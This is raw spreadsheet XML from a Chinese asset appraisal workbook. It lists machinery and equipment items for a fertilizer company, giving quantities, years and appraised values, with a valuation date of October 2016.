      <c r="E234" s="10" t="s">
        <v>1902</v>
      </c>
      <c r="F234" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G234" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H234" s="11">
        <v>3</v>
      </c>
      <c r="I234" s="11">
        <v>2011</v>
      </c>
      <c r="J234" s="205"/>
      <c r="K234" s="188">
        <v>149760</v>
      </c>
      <c r="L234" s="191" t="s">
        <v>1671</v>
      </c>
    </row>
    <row r="235" customHeight="1" spans="2:12">
      <c r="B235" s="16">
        <v>229</v>
      </c>
      <c r="C235" s="11"/>
      <c r="D235" s="10" t="s">
        <v>1492</v>
      </c>
      <c r="E235" s="10" t="s">
        <v>1903</v>
      </c>
      <c r="F235" s="11" t="s">
        <v>1510</v>
      </c>
      <c r="G235" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H235" s="11">
        <v>8</v>
      </c>
      <c r="I235" s="11">
        <v>1996</v>
      </c>
      <c r="J235" s="205"/>
      <c r="K235" s="188">
        <v>7424</v>
      </c>
      <c r="L235" s="191" t="s">
        <v>1904</v>
      </c>
    </row>
    <row r="236" customHeight="1" spans="2:12">
      <c r="B236" s="16">
        <v>230</v>
      </c>
      <c r="C236" s="11"/>
      <c r="D236" s="10" t="s">
        <v>1905</v>
      </c>
      <c r="E236" s="10" t="s">
        <v>1093</v>
      </c>
      <c r="F236" s="11" t="s">
        <v>1906</v>
      </c>
      <c r="G236" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H236" s="11">
        <v>2</v>
      </c>
      <c r="I236" s="11">
        <v>2000</v>
      </c>
      <c r="J236" s="205"/>
      <c r="K236" s="188">
        <v>409.6</v>
      </c>
      <c r="L236" s="191" t="s">
        <v>1904</v>
      </c>
    </row>
    <row r="237" customHeight="1" spans="2:12">
      <c r="B237" s="16">
        <v>231</v>
      </c>
      <c r="C237" s="11"/>
      <c r="D237" s="10" t="s">
        <v>1492</v>
      </c>
      <c r="E237" s="10" t="s">
        <v>1431</v>
      </c>
      <c r="F237" s="11" t="s">
        <v>1681</v>
      </c>
      <c r="G237" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H237" s="11">
        <v>1</v>
      </c>
      <c r="I237" s="11">
        <v>2007</v>
      </c>
      <c r="J237" s="205"/>
      <c r="K237" s="188">
        <v>2088</v>
      </c>
      <c r="L237" s="191" t="s">
        <v>1907</v>
      </c>
    </row>
    <row r="238" customHeight="1" spans="2:12">
      <c r="B238" s="16">
        <v>232</v>
      </c>
      <c r="C238" s="11"/>
      <c r="D238" s="10" t="s">
        <v>1451</v>
      </c>
      <c r="E238" s="10" t="s">
        <v>1908</v>
      </c>
      <c r="F238" s="11"/>
      <c r="G238" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H238" s="11">
        <v>5</v>
      </c>
      <c r="I238" s="11"/>
      <c r="J238" s="205"/>
      <c r="K238" s="188">
        <v>4640</v>
      </c>
      <c r="L238" s="191" t="s">
        <v>1909</v>
      </c>
    </row>
    <row r="239" customHeight="1" spans="2:12">
      <c r="B239" s="16">
        <v>233</v>
      </c>
      <c r="C239" s="11"/>
      <c r="D239" s="10" t="s">
        <v>1463</v>
      </c>
      <c r="E239" s="10" t="s">
        <v>1828</v>
      </c>
      <c r="F239" s="11"/>
      <c r="G239" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H239" s="11">
        <v>1</v>
      </c>
      <c r="I239" s="11"/>
      <c r="J239" s="205"/>
      <c r="K239" s="188">
        <v>2380.8</v>
      </c>
      <c r="L239" s="191" t="s">
        <v>1909</v>
      </c>
    </row>
    <row r="240" customHeight="1" spans="2:12">
      <c r="B240" s="16">
        <v>234</v>
      </c>
      <c r="C240" s="11"/>
      <c r="D240" s="10" t="s">
        <v>1910</v>
      </c>
      <c r="E240" s="10"/>
      <c r="F240" s="11"/>
      <c r="G240" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H240" s="11">
        <v>1</v>
      </c>
      <c r="I240" s="11"/>
      <c r="J240" s="205"/>
      <c r="K240" s="188">
        <v>2560</v>
      </c>
      <c r="L240" s="191" t="s">
        <v>1909</v>
      </c>
    </row>
    <row r="241" customHeight="1" spans="2:12">
      <c r="B241" s="16">
        <v>235</v>
      </c>
      <c r="C241" s="11"/>
      <c r="D241" s="10" t="s">
        <v>1412</v>
      </c>
      <c r="E241" s="10"/>
      <c r="F241" s="11"/>
      <c r="G241" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H241" s="11">
        <v>1</v>
      </c>
      <c r="I241" s="11"/>
      <c r="J241" s="205"/>
      <c r="K241" s="188">
        <v>6400</v>
      </c>
      <c r="L241" s="191" t="s">
        <v>1909</v>
      </c>
    </row>
    <row r="242" customHeight="1" spans="2:12">
      <c r="B242" s="16">
        <v>236</v>
      </c>
      <c r="C242" s="11"/>
      <c r="D242" s="10" t="s">
        <v>1668</v>
      </c>
      <c r="E242" s="10" t="s">
        <v>1349</v>
      </c>
      <c r="F242" s="11" t="s">
        <v>1622</v>
      </c>
      <c r="G242" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H242" s="11">
        <v>3</v>
      </c>
      <c r="I242" s="11">
        <v>2008</v>
      </c>
      <c r="J242" s="205"/>
      <c r="K242" s="188">
        <v>6960</v>
      </c>
      <c r="L242" s="191" t="s">
        <v>1911</v>
      </c>
    </row>
    <row r="243" customHeight="1" spans="2:12">
      <c r="B243" s="16">
        <v>237</v>
      </c>
      <c r="C243" s="11"/>
      <c r="D243" s="10" t="s">
        <v>1668</v>
      </c>
      <c r="E243" s="10" t="s">
        <v>1912</v>
      </c>
      <c r="F243" s="11" t="s">
        <v>1913</v>
      </c>
      <c r="G243" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H243" s="11">
        <v>4</v>
      </c>
      <c r="I243" s="11" t="s">
        <v>1914</v>
      </c>
      <c r="J243" s="205"/>
      <c r="K243" s="188">
        <v>5568</v>
      </c>
      <c r="L243" s="191" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="244" customHeight="1" spans="2:12">
      <c r="B244" s="16">
        <v>238</v>
      </c>
      <c r="C244" s="11"/>
      <c r="D244" s="10" t="s">
        <v>1522</v>
      </c>
      <c r="E244" s="10" t="s">
        <v>1663</v>
      </c>
      <c r="F244" s="11" t="s">
        <v>1916</v>
      </c>
      <c r="G244" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H244" s="11">
        <v>1</v>
      </c>
      <c r="I244" s="11">
        <v>2008</v>
      </c>
      <c r="J244" s="205"/>
      <c r="K244" s="188">
        <v>45600</v>
      </c>
      <c r="L244" s="191" t="s">
        <v>1917</v>
      </c>
    </row>
    <row r="245" customHeight="1" spans="2:12">
      <c r="B245" s="16">
        <v>239</v>
      </c>
      <c r="C245" s="11"/>
      <c r="D245" s="10" t="s">
        <v>1918</v>
      </c>
      <c r="E245" s="10"/>
      <c r="F245" s="11"/>
      <c r="G245" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H245" s="11">
        <v>3</v>
      </c>
      <c r="I245" s="11">
        <v>2005</v>
      </c>
      <c r="J245" s="205"/>
      <c r="K245" s="188">
        <v>13440</v>
      </c>
      <c r="L245" s="191" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="246" customHeight="1" spans="2:12">
      <c r="B246" s="16">
        <v>240</v>
      </c>
      <c r="C246" s="11"/>
      <c r="D246" s="10" t="s">
        <v>1920</v>
      </c>
      <c r="E246" s="10"/>
      <c r="F246" s="11"/>
      <c r="G246" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H246" s="11">
        <v>2</v>
      </c>
      <c r="I246" s="11">
        <v>2005</v>
      </c>
      <c r="J246" s="205"/>
      <c r="K246" s="188">
        <v>22400</v>
      </c>
      <c r="L246" s="191" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="247" customHeight="1" spans="2:12">
      <c r="B247" s="16">
        <v>241</v>
      </c>
      <c r="C247" s="11"/>
      <c r="D247" s="10" t="s">
        <v>1921</v>
      </c>
      <c r="E247" s="10"/>
      <c r="F247" s="11"/>
      <c r="G247" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H247" s="11">
        <v>8</v>
      </c>
      <c r="I247" s="11">
        <v>1995</v>
      </c>
      <c r="J247" s="205"/>
      <c r="K247" s="188">
        <v>12288</v>
      </c>
      <c r="L247" s="191" t="s">
        <v>1919</v>
      </c>
    </row>
    <row r="248" customHeight="1" spans="2:12">
      <c r="B248" s="16">
        <v>242</v>
      </c>
      <c r="C248" s="11"/>
      <c r="D248" s="10" t="s">
        <v>1922</v>
      </c>
      <c r="E248" s="10"/>
      <c r="F248" s="11"/>
      <c r="G248" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H248" s="11">
        <v>4</v>
      </c>
      <c r="I248" s="11">
        <v>2003</v>
      </c>
      <c r="J248" s="205"/>
      <c r="K248" s="188">
        <v>12800</v>
      </c>
      <c r="L248" s="191" t="s">
        <v>1923</v>
      </c>
    </row>
    <row r="249" customHeight="1" spans="2:12">
      <c r="B249" s="16">
        <v>243</v>
      </c>
      <c r="C249" s="11"/>
      <c r="D249" s="10" t="s">
        <v>1924</v>
      </c>
      <c r="E249" s="10"/>
      <c r="F249" s="11" t="s">
        <v>1925</v>
      </c>
      <c r="G249" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H249" s="11">
        <v>1</v>
      </c>
      <c r="I249" s="11">
        <v>2003</v>
      </c>
      <c r="J249" s="205"/>
      <c r="K249" s="188">
        <v>8000</v>
      </c>
      <c r="L249" s="191" t="s">
        <v>1923</v>
      </c>
    </row>
    <row r="250" customHeight="1" spans="2:12">
      <c r="B250" s="16">
        <v>244</v>
      </c>
      <c r="C250" s="11"/>
      <c r="D250" s="10" t="s">
        <v>1522</v>
      </c>
      <c r="E250" s="10" t="s">
        <v>1926</v>
      </c>
      <c r="F250" s="11"/>
      <c r="G250" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H250" s="11">
        <v>1</v>
      </c>
      <c r="I250" s="11">
        <v>1992</v>
      </c>
      <c r="J250" s="205"/>
      <c r="K250" s="188">
        <v>16640</v>
      </c>
      <c r="L250" s="191" t="s">
        <v>1927</v>
      </c>
    </row>
    <row r="251" customHeight="1" spans="2:12">
      <c r="B251" s="16">
        <v>245</v>
      </c>
      <c r="C251" s="11"/>
      <c r="D251" s="10" t="s">
        <v>1587</v>
      </c>
      <c r="E251" s="10" t="s">
        <v>1928</v>
      </c>
      <c r="F251" s="11" t="s">
        <v>1895</v>
      </c>
      <c r="G251" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H251" s="11">
        <v>3</v>
      </c>
      <c r="I251" s="11" t="s">
        <v>1929</v>
      </c>
      <c r="J251" s="205"/>
      <c r="K251" s="188">
        <v>11520</v>
      </c>
      <c r="L251" s="191" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="252" customHeight="1" spans="2:12">
      <c r="B252" s="16">
        <v>246</v>
      </c>
      <c r="C252" s="11"/>
      <c r="D252" s="10" t="s">
        <v>1492</v>
      </c>
      <c r="E252" s="10"/>
      <c r="F252" s="11"/>
      <c r="G252" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H252" s="11">
        <v>2</v>
      </c>
      <c r="I252" s="11"/>
      <c r="J252" s="205"/>
      <c r="K252" s="188">
        <v>580</v>
      </c>
      <c r="L252" s="191" t="s">
        <v>1930</v>
      </c>
    </row>
    <row r="253" customHeight="1" spans="2:12">
      <c r="B253" s="16">
        <v>247</v>
      </c>
      <c r="C253" s="11"/>
      <c r="D253" s="10" t="s">
        <v>1414</v>
      </c>
      <c r="E253" s="10" t="s">
        <v>1931</v>
      </c>
      <c r="F253" s="11" t="s">
        <v>1932</v>
      </c>
      <c r="G253" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H253" s="11">
        <v>20</v>
      </c>
      <c r="I253" s="11" t="s">
        <v>1933</v>
      </c>
      <c r="J253" s="205"/>
      <c r="K253" s="188">
        <v>192000</v>
      </c>
      <c r="L253" s="191" t="s">
        <v>1934</v>
      </c>
    </row>
    <row r="254" customHeight="1" spans="2:12">
      <c r="B254" s="16">
        <v>248</v>
      </c>
      <c r="C254" s="11"/>
      <c r="D254" s="10" t="s">
        <v>1414</v>
      </c>
      <c r="E254" s="10" t="s">
        <v>1935</v>
      </c>
      <c r="F254" s="11" t="s">
        <v>1936</v>
      </c>
      <c r="G254" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H254" s="11">
        <v>21</v>
      </c>
      <c r="I254" s="11" t="s">
        <v>1937</v>
      </c>
      <c r="J254" s="205"/>
      <c r="K254" s="188">
        <v>268800</v>
      </c>
      <c r="L254" s="191" t="s">
        <v>1934</v>
      </c>
    </row>
    <row r="255" customHeight="1" spans="2:12">
      <c r="B255" s="16">
        <v>249</v>
      </c>
      <c r="C255" s="11"/>
      <c r="D255" s="10" t="s">
        <v>1414</v>
      </c>
      <c r="E255" s="10" t="s">
        <v>1938</v>
      </c>
      <c r="F255" s="11" t="s">
        <v>1939</v>
      </c>
      <c r="G255" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H255" s="11">
        <v>9</v>
      </c>
      <c r="I255" s="11">
        <v>1992</v>
      </c>
      <c r="J255" s="205"/>
      <c r="K255" s="188">
        <v>57600</v>
      </c>
      <c r="L255" s="191" t="s">
        <v>1940</v>
      </c>
    </row>
    <row r="256" customHeight="1" spans="2:12">
      <c r="B256" s="16"/>
      <c r="C256" s="11"/>
      <c r="D256" s="10"/>
      <c r="E256" s="10"/>
      <c r="F256" s="11"/>
      <c r="G256" s="16"/>
      <c r="H256" s="11"/>
      <c r="I256" s="11"/>
      <c r="J256" s="205"/>
      <c r="K256" s="188">
        <v>0</v>
      </c>
      <c r="L256" s="191"/>
    </row>
    <row r="257" customHeight="1" spans="2:12">
      <c r="B257" s="16"/>
      <c r="C257" s="16"/>
      <c r="D257" s="9"/>
      <c r="E257" s="9"/>
      <c r="F257" s="16"/>
      <c r="G257" s="16"/>
      <c r="H257" s="16"/>
      <c r="I257" s="16"/>
      <c r="J257" s="17"/>
      <c r="K257" s="188">
        <v>0</v>
      </c>
      <c r="L257" s="191"/>
    </row>
    <row r="258" customHeight="1" spans="2:12">
      <c r="B258" s="16"/>
      <c r="C258" s="16"/>
      <c r="D258" s="9"/>
      <c r="E258" s="9"/>
      <c r="F258" s="16"/>
      <c r="G258" s="16"/>
      <c r="H258" s="16"/>
      <c r="I258" s="16"/>
      <c r="J258" s="17"/>
      <c r="K258" s="188">
        <v>0</v>
      </c>
      <c r="L258" s="191"/>
    </row>
    <row r="259" customHeight="1" spans="2:12">
      <c r="B259" s="16"/>
      <c r="C259" s="16"/>
      <c r="D259" s="9"/>
      <c r="E259" s="9"/>
      <c r="F259" s="16"/>
      <c r="G259" s="16"/>
      <c r="H259" s="16"/>
      <c r="I259" s="16"/>
      <c r="J259" s="17"/>
      <c r="K259" s="188">
        <v>0</v>
      </c>
      <c r="L259" s="191"/>
    </row>
    <row r="260" customHeight="1" spans="2:12">
      <c r="B260" s="16"/>
      <c r="C260" s="16"/>
      <c r="D260" s="9"/>
      <c r="E260" s="9"/>
      <c r="F260" s="16"/>
      <c r="G260" s="16"/>
      <c r="H260" s="16"/>
      <c r="I260" s="16"/>
      <c r="J260" s="17"/>
      <c r="K260" s="188">
        <v>0</v>
      </c>
      <c r="L260" s="191"/>
    </row>
    <row r="261" customHeight="1" spans="2:12">
      <c r="B261" s="16"/>
      <c r="C261" s="16"/>
      <c r="D261" s="9"/>
      <c r="E261" s="9"/>
      <c r="F261" s="16"/>
      <c r="G261" s="16"/>
      <c r="H261" s="16"/>
      <c r="I261" s="16"/>
      <c r="J261" s="17"/>
      <c r="K261" s="188">
        <v>0</v>
      </c>
      <c r="L261" s="191"/>
    </row>
    <row r="262" customHeight="1" spans="2:12">
      <c r="B262" s="16"/>
      <c r="C262" s="16"/>
      <c r="D262" s="9"/>
      <c r="E262" s="9"/>
      <c r="F262" s="16"/>
      <c r="G262" s="16"/>
      <c r="H262" s="16"/>
      <c r="I262" s="16"/>
      <c r="J262" s="17"/>
      <c r="K262" s="188">
        <v>0</v>
      </c>
      <c r="L262" s="191"/>
    </row>
    <row r="263" customHeight="1" spans="2:12">
      <c r="B263" s="16"/>
      <c r="C263" s="16"/>
      <c r="D263" s="9"/>
      <c r="E263" s="9"/>
      <c r="F263" s="16"/>
      <c r="G263" s="16"/>
      <c r="H263" s="16"/>
      <c r="I263" s="16"/>
      <c r="J263" s="17"/>
      <c r="K263" s="188">
        <v>0</v>
      </c>
      <c r="L263" s="191"/>
    </row>
    <row r="264" customHeight="1" spans="2:12">
      <c r="B264" s="206" t="s">
        <v>1360</v>
      </c>
      <c r="C264" s="207"/>
      <c r="D264" s="208"/>
      <c r="E264" s="9"/>
      <c r="F264" s="16"/>
      <c r="G264" s="16"/>
      <c r="H264" s="209">
        <v>674</v>
      </c>
      <c r="I264" s="130"/>
      <c r="J264" s="126">
        <v>23265471.82</v>
      </c>
      <c r="K264" s="188">
        <v>7104694.24224</v>
      </c>
      <c r="L264" s="191"/>
    </row>
  </sheetData>
  <mergeCells count="15">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B264:D264"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
    <mergeCell ref="L5:L6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.789583333333333" header="0.929861111111111" footer="0.529861111111111"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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B1:L241"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:L3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="23.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="9" style="176"/>
    <col min="2" max="2" width="4.375" style="177" customWidth="1"/>
    <col min="3" max="3" width="6" style="177" customWidth="1"/>
    <col min="4" max="4" width="23.125" style="177" customWidth="1"/>
    <col min="5" max="5" width="18.375" style="177" customWidth="1"/>
    <col min="6" max="6" width="9" style="177"/>
    <col min="7" max="7" width="5.625" style="177" customWidth="1"/>
    <col min="8" max="8" width="5.125" style="177" customWidth="1"/>
    <col min="9" max="9" width="11.125" style="176" customWidth="1"/>
    <col min="10" max="10" width="11.5" style="176" customWidth="1"/>
    <col min="11" max="11" width="12.375" style="176" customWidth="1"/>
    <col min="12" max="12" width="20.25" style="177" customWidth="1"/>
    <col min="13" max="16384" width="9" style="176"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:12">
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" customHeight="1" spans="2:12">
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
    </row>
    <row r="3" customHeight="1" spans="2:12">
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
    </row>
    <row r="5" customHeight="1" spans="2:12">
      <c r="B5" s="8" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="8" t="s">
        <v>210</v>
      </c>
      <c r="D5" s="6" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="8" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="8" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="8" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="184" t="s">
        <v>1362</v>
      </c>
      <c r="J5" s="184" t="s">
        <v>217</v>
      </c>
      <c r="K5" s="8" t="s">
        <v>218</v>
      </c>
      <c r="L5" s="185" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:12">
      <c r="B6" s="8"/>
      <c r="C6" s="8"/>
      <c r="D6" s="6"/>
      <c r="E6" s="8"/>
      <c r="F6" s="6"/>
      <c r="G6" s="8"/>
      <c r="H6" s="8"/>
      <c r="I6" s="186"/>
      <c r="J6" s="186"/>
      <c r="K6" s="8"/>
      <c r="L6" s="185"/>
    </row>
    <row r="7" customHeight="1" spans="2:12">
      <c r="B7" s="178">
        <v>1</v>
      </c>
      <c r="C7" s="243" t="s">
        <v>1941</v>
      </c>
      <c r="D7" s="244" t="s">
        <v>1942</v>
      </c>
      <c r="E7" s="244" t="s">
        <v>1943</v>
      </c>
      <c r="F7" s="94"/>
      <c r="G7" s="178" t="s">
        <v>223</v>
      </c>
      <c r="H7" s="94">
        <v>1</v>
      </c>
      <c r="I7" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J7" s="187">
        <v>5100</v>
      </c>
      <c r="K7" s="188">
        <v>204</v>
      </c>
      <c r="L7" s="245" t="s">
        <v>1930</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:12">
      <c r="B8" s="16">
        <v>2</v>
      </c>
      <c r="C8" s="237" t="s">
        <v>1944</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>1945</v>
      </c>
      <c r="E8" s="10" t="s">
        <v>1946</v>
      </c>
      <c r="F8" s="11"/>
      <c r="G8" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H8" s="11">
        <v>1</v>
      </c>
      <c r="I8" s="11">
        <v>2002</v>
      </c>
      <c r="J8" s="190">
        <v>2160</v>
      </c>
      <c r="K8" s="188">
        <v>0</v>
      </c>
      <c r="L8" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:12">
      <c r="B9" s="16">
        <v>3</v>
      </c>
      <c r="C9" s="237" t="s">
        <v>1948</v>
      </c>
      <c r="D9" s="238" t="s">
        <v>1949</v>
      </c>
      <c r="E9" s="238" t="s">
        <v>1950</v>
      </c>
      <c r="F9" s="11"/>
      <c r="G9" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H9" s="11">
        <v>1</v>
      </c>
      <c r="I9" s="11">
        <v>1996</v>
      </c>
      <c r="J9" s="192">
        <v>2020</v>
      </c>
      <c r="K9" s="188">
        <v>80.8</v>
      </c>
      <c r="L9" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:12">
      <c r="B10" s="16">
        <v>4</v>
      </c>
      <c r="C10" s="237" t="s">
        <v>1951</v>
      </c>
      <c r="D10" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E10" s="238" t="s">
        <v>1953</v>
      </c>
      <c r="F10" s="11"/>
      <c r="G10" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H10" s="11">
        <v>1</v>
      </c>
      <c r="I10" s="11">
        <v>1996</v>
      </c>
      <c r="J10" s="192">
        <v>16000</v>
      </c>
      <c r="K10" s="188">
        <v>640</v>
      </c>
      <c r="L10" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:12">
      <c r="B11" s="16">
        <v>5</v>
      </c>
      <c r="C11" s="237" t="s">
        <v>1954</v>
      </c>
      <c r="D11" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E11" s="238" t="s">
        <v>1955</v>
      </c>
      <c r="F11" s="11"/>
      <c r="G11" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H11" s="11">
        <v>3</v>
      </c>
      <c r="I11" s="11">
        <v>1996</v>
      </c>
      <c r="J11" s="192">
        <v>120000</v>
      </c>
      <c r="K11" s="188">
        <v>4800</v>
      </c>
      <c r="L11" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:12">
      <c r="B12" s="16">
        <v>6</v>
      </c>
      <c r="C12" s="237" t="s">
        <v>1956</v>
      </c>
      <c r="D12" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E12" s="238" t="s">
        <v>1957</v>
      </c>
      <c r="F12" s="11"/>
      <c r="G12" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="11">
        <v>1</v>
      </c>
      <c r="I12" s="11">
        <v>1996</v>
      </c>
      <c r="J12" s="192">
        <v>11000</v>
      </c>
      <c r="K12" s="188">
        <v>440</v>
      </c>
      <c r="L12" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:12">
      <c r="B13" s="16">
        <v>7</v>
      </c>
      <c r="C13" s="237" t="s">
        <v>1958</v>
      </c>
      <c r="D13" s="238" t="s">
        <v>1959</v>
      </c>
      <c r="E13" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="F13" s="11"/>
      <c r="G13" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H13" s="11">
        <v>2</v>
      </c>
      <c r="I13" s="11">
        <v>1996</v>
      </c>
      <c r="J13" s="192">
        <v>11000</v>
      </c>
      <c r="K13" s="188">
        <v>440</v>
      </c>
      <c r="L13" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:12">
      <c r="B14" s="16">
        <v>8</v>
      </c>
      <c r="C14" s="237" t="s">
        <v>1961</v>
      </c>
      <c r="D14" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E14" s="238" t="s">
        <v>1963</v>
      </c>
      <c r="F14" s="11"/>
      <c r="G14" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H14" s="11">
        <v>3</v>
      </c>
      <c r="I14" s="11">
        <v>1996</v>
      </c>
      <c r="J14" s="192">
        <v>45900</v>
      </c>
      <c r="K14" s="188">
        <v>1836</v>
      </c>
      <c r="L14" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:12">
      <c r="B15" s="16">
        <v>9</v>
      </c>
      <c r="C15" s="237" t="s">
        <v>1964</v>
      </c>
      <c r="D15" s="238" t="s">
        <v>1965</v>
      </c>
      <c r="E15" s="238" t="s">
        <v>1966</v>
      </c>
      <c r="F15" s="11"/>
      <c r="G15" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H15" s="11">
        <v>1</v>
      </c>
      <c r="I15" s="11">
        <v>1996</v>
      </c>
      <c r="J15" s="192">
        <v>25600</v>
      </c>
      <c r="K15" s="188">
        <v>1024</v>
      </c>
      <c r="L15" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:12">
      <c r="B16" s="16">
        <v>10</v>
      </c>
      <c r="C16" s="237" t="s">
        <v>1967</v>
      </c>
      <c r="D16" s="238" t="s">
        <v>1968</v>
      </c>
      <c r="E16" s="238" t="s">
        <v>1969</v>
      </c>
      <c r="F16" s="11"/>
      <c r="G16" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H16" s="11">
        <v>2</v>
      </c>
      <c r="I16" s="11">
        <v>1996</v>
      </c>
      <c r="J16" s="192">
        <v>54000</v>
      </c>
      <c r="K16" s="188">
        <v>2160</v>
      </c>
      <c r="L16" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:12">
      <c r="B17" s="16">
        <v>11</v>
      </c>
      <c r="C17" s="237" t="s">
        <v>1970</v>
      </c>
      <c r="D17" s="238" t="s">
        <v>1971</v>
      </c>
      <c r="E17" s="238" t="s">
        <v>1972</v>
      </c>
      <c r="F17" s="11"/>
      <c r="G17" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H17" s="11">
        <v>3</v>
      </c>
      <c r="I17" s="11">
        <v>1996</v>
      </c>
      <c r="J17" s="192">
        <v>52000</v>
      </c>
      <c r="K17" s="188">
        <v>2080</v>
      </c>
      <c r="L17" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:12">
      <c r="B18" s="16">
        <v>12</v>
      </c>
      <c r="C18" s="237" t="s">
        <v>1973</v>
      </c>
      <c r="D18" s="238" t="s">
        <v>1974</v>
      </c>
      <c r="E18" s="238" t="s">
        <v>1975</v>
      </c>
      <c r="F18" s="11"/>
      <c r="G18" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H18" s="11">
        <v>1</v>
      </c>
      <c r="I18" s="11">
        <v>1996</v>
      </c>
